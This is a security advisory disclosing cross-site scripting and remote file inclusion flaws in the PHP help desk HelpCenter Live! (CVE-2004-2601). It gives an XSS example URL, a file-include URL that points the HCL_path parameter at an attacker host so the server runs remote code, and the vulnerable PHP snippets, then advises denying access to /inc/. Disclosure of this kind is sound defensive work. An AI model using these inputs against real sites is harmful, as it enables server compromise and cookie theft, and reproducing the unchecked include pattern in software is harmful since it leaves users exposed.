Are you looking to have your application properly secured by an experienced professional? Contact us today for a free private consultation. We specialize in web application security, mobile security, and also offer general consultation services. Click here for more information regarding all of our security services.
HelpCenter Live! Multiple Vulnerabilities
Vendor: Michael Bird
Product: HelpCenter Live!
Version: <= 1.2.6
Website: http://www.helpcenterlive.com/
BID: 12105
CVE: CVE-2004-2601
OSVDB: 12597 12598 12631
SECUNIA: 13652
Description:
Help Center Live is a `Live` help desk system written in PHP using a MySql database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.


Cross Site Scripting:
Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.

http://path/faq/index.php?find=[CODEGOESHERE]&search=Search

This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


File Include Vulnerability:
There lies a very dangerous file include vulnerability in help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file

http://path/inc/pipe.php?HCL_path=http://attacker

All an attacker has to do is include any malicious php code and it will be executed. Here is the vulnerable code, it is located in inc/pipe.php

$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage); 


Since we call the pipe.php file directly we can now include a file as long as register globals is turned on in the php configuration settings. There is a similar in skin.php, this could be used in some circumstances to gain access to arbitrary local files and possibly more.

// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
	$SKIN_inner = "default";
}

// Get the skins
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);
blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);



Solution:
I have contacted the developer, but received no answer. My advice would be for any users running help center live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.


Credits:
James Bercegay of the GulfTech Security Research Team